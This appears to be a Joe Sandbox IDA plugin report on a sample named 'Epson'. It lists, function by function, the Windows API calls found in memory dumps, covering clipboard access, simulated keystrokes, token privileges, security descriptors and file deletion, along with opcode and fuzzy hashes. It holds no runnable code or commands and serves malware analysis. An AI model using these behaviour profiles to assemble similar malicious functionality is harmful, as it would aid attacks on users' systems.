                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45B0922484860005AD282A395E499D9330E78423B67DC1BC0E47989AE1C33D880FBD50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00FBDC54: FindFirstFileW.KERNEL32(?,?), ref: 00FBDCCB
                                                                                                                                                                                                                                        • Part of subcall function 00FBDC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00FBDD1B
                                                                                                                                                                                                                                        • Part of subcall function 00FBDC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00FBDD2C
                                                                                                                                                                                                                                        • Part of subcall function 00FBDC54: FindClose.KERNEL32(00000000), ref: 00FBDD43
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00FC666E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2191629493-0
                                                                                                                                                                                                                                      • Opcode ID: d5d93dc3c615a12245d2b5fece8e89fd3c25a066664883a57e0f4631b48ba760
                                                                                                                                                                                                                                      • Instruction ID: 85fece53d293ae02756ef895f4116abaf11441c10b4c949a9da2d39f37ef2827
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5d93dc3c615a12245d2b5fece8e89fd3c25a066664883a57e0f4631b48ba760
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0F082356102049FC714EF59D846B6EB7E5AF84361F048409FD099B352CB74BC05DB91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00F6FC86
                                                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FAFCB8
                                                                                                                                                                                                                                      • IsIconic.USER32(00000000), ref: 00FAFCC1
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000009), ref: 00FAFCCE
                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00FAFCD8
                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FAFCEE
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00FAFCF5
                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FAFD01
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FAFD12
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FAFD1A
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00FAFD22
                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00FAFD25
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FAFD3A
                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00FAFD45
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FAFD4F
                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00FAFD54
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FAFD5D
                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00FAFD62
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FAFD6C
                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00FAFD71
                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00FAFD74
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00FAFD9B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                      • API String ID: 4125248594-2988720461
                                                                                                                                                                                                                                      • Opcode ID: b887f2b000f335c1bf0d3b555c87cd68ca159556e075b7adb6e504f796a57fc7
                                                                                                                                                                                                                                      • Instruction ID: fb3881f1fdbbbfe7ab6a770c333a73ab239d32350c8e272449ce691acd780cd6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b887f2b000f335c1bf0d3b555c87cd68ca159556e075b7adb6e504f796a57fc7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B3163B1A4035C7EEB216BA55C89F7F7E6CEB44B60F140065FA01EE1D1D6B15D00BAA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00FB2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FB205A
                                                                                                                                                                                                                                        • Part of subcall function 00FB2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FB2087
                                                                                                                                                                                                                                        • Part of subcall function 00FB2010: GetLastError.KERNEL32 ref: 00FB2097
                                                                                                                                                                                                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00FB1BD2
                                                                                                                                                                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00FB1BF4
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00FB1C05
                                                                                                                                                                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00FB1C1D
                                                                                                                                                                                                                                      • GetProcessWindowStation.USER32 ref: 00FB1C36
                                                                                                                                                                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 00FB1C40
                                                                                                                                                                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00FB1C5C
                                                                                                                                                                                                                                        • Part of subcall function 00FB1A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FB1B48), ref: 00FB1A20
                                                                                                                                                                                                                                        • Part of subcall function 00FB1A0B: CloseHandle.KERNEL32(?,?,00FB1B48), ref: 00FB1A35
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                      • String ID: $default$winsta0
                                                                                                                                                                                                                                      • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                      • Opcode ID: 2b17c8c917ad6a0f292b27fa022ee36eef32cd8c1df63ae1f3f0c23b9426ce76
                                                                                                                                                                                                                                      • Instruction ID: 0cb7d649db021daa4ab45cb3eb7bed66b3d8dea5413dc236a2fd7128f8efd68b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b17c8c917ad6a0f292b27fa022ee36eef32cd8c1df63ae1f3f0c23b9426ce76
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F281AB71900248AFDF219FA5DC99FEE7BB8FF08310F544129F914AA1A0D7758A45EF60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00FB1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FB1A60
                                                                                                                                                                                                                                        • Part of subcall function 00FB1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00FB14E7,?,?,?), ref: 00FB1A6C
                                                                                                                                                                                                                                        • Part of subcall function 00FB1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00FB14E7,?,?,?), ref: 00FB1A7B
                                                                                                                                                                                                                                        • Part of subcall function 00FB1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00FB14E7,?,?,?), ref: 00FB1A82
                                                                                                                                                                                                                                        • Part of subcall function 00FB1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FB1A99
                                                                                                                                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FB1518
                                                                                                                                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FB154C
                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00FB1563
                                                                                                                                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00FB159D
                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FB15B9
                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00FB15D0
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00FB15D8
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00FB15DF
                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FB1600
                                                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 00FB1607
                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FB1636
                                                                                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FB1658
                                                                                                                                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FB166A
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FB1691
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00FB1698
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FB16A1
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00FB16A8
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FB16B1
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00FB16B8
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00FB16C4
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00FB16CB
                                                                                                                                                                                                                                        • Part of subcall function 00FB1ADF: GetProcessHeap.KERNEL32(00000008,00FB14FD,?,00000000,?,00FB14FD,?), ref: 00FB1AED
                                                                                                                                                                                                                                        • Part of subcall function 00FB1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00FB14FD,?), ref: 00FB1AF4
                                                                                                                                                                                                                                        • Part of subcall function 00FB1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00FB14FD,?), ref: 00FB1B03
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4175595110-0
                                                                                                                                                                                                                                      • Opcode ID: 0a9c00b763a0b61e6f97432ffdcade75bf178d083ee5df9be9658f549a252bf0
                                                                                                                                                                                                                                      • Instruction ID: 8278747b74f1ba8de1c1cde735a4825af5d3753c0a376502eadfa84785d128b3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a9c00b763a0b61e6f97432ffdcade75bf178d083ee5df9be9658f549a252bf0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC7188B2D01209ABDF10DFA6DC98FEEBBB9BF04310F484515E915EA190D7359A05EFA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • OpenClipboard.USER32(00FEDCD0), ref: 00FCF586
                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00FCF594
                                                                                                                                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 00FCF5A0
                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00FCF5AC
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00FCF5E4
                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00FCF5EE
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00FCF619
                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00FCF626
                                                                                                                                                                                                                                      • GetClipboardData.USER32(00000001), ref: 00FCF62E
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00FCF63F
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00FCF67F
                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 00FCF695
                                                                                                                                                                                                                                      • GetClipboardData.USER32(0000000F), ref: 00FCF6A1
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00FCF6B2
                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00FCF6D4
                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00FCF6F1
                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00FCF72F
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00FCF750
                                                                                                                                                                                                                                      • CountClipboardFormats.USER32 ref: 00FCF771
                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00FCF7B6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 420908878-0
                                                                                                                                                                                                                                      • Opcode ID: ae90d51bdfcd22bd9d6ed5a2ddb89d814918f02a94f2624bf42663c5bafc8be3
                                                                                                                                                                                                                                      • Instruction ID: dd1b7b5adcb8995124f4bc35406b16bbd23f82d1648fb772bfe360f57d00aad0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae90d51bdfcd22bd9d6ed5a2ddb89d814918f02a94f2624bf42663c5bafc8be3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA610331200346AFC300EF20DD86F2ABBA5AF84714F14446CF946CB2A2DB31DD49EB62
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00FC7403
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00FC7457
                                                                                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FC7493
                                                                                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FC74BA
                                                                                                                                                                                                                                        • Part of subcall function 00F5B329: _wcslen.LIBCMT ref: 00F5B333
                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FC74F7
                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FC7524
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                      • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                      • Opcode ID: 8bbf10d2a1b1bcca0919fe13fd1bb7c373e9a20fcd8c615dfa50227a958f0d20
                                                                                                                                                                                                                                      • Instruction ID: 5b322387719b8c19d4d9227e1505d7247fba07b16e0b3d5da94eaf0a8aa203fa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8bbf10d2a1b1bcca0919fe13fd1bb7c373e9a20fcd8c615dfa50227a958f0d20
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DBD16272508344AEC304EB64CC82EBBB7ECAF88705F44091DFA85D6151EB79DA48DB62
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00FCA0A8
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00FCA0E6
                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00FCA100
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00FCA118
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00FCA123
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00FCA13F
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FCA18F
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(01017B94), ref: 00FCA1AD
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FCA1B7
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00FCA1C4
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00FCA1D4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                      • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                      • Opcode ID: 044a4842257887e38be4e6098cabf44d187f55a9481110d3e1bdcb95359003c1
                                                                                                                                                                                                                                      • Instruction ID: a83f85e302b51d822af0a98b197ed4ffae0561b11eec3c8ea9bc726416671483
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 044a4842257887e38be4e6098cabf44d187f55a9481110d3e1bdcb95359003c1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6731083190024E6FDB109FB5DD8AFDE77ACAF04378F144059E915E6090EB74EE44AE21
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FC4785
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FC47B2
                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00FC47E2
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00FC4803
                                                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00FC4813
                                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00FC489A
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00FC48A5
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00FC48B0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                                                                                                                                      • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                      • Opcode ID: a4de3f81f399dac89b522a5b07ba5093aeaf72b01b7b6462f81ba063a8e7f5ea
                                                                                                                                                                                                                                      • Instruction ID: 8a8c21b57613ff8fba0cc77d8a84b9b4a1c2a9ef4c019d06857dd3c6044dee26
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4de3f81f399dac89b522a5b07ba5093aeaf72b01b7b6462f81ba063a8e7f5ea
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9731947190014AABDB219FA0DC89FEB37BCEF89710F1041BAF619D60A0E7749644EB25
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00FCA203
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00FCA25E
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00FCA269
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00FCA285
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FCA2D5
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(01017B94), ref: 00FCA2F3
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FCA2FD
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00FCA30A
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00FCA31A
                                                                                                                                                                                                                                        • Part of subcall function 00FBE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00FBE3B4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
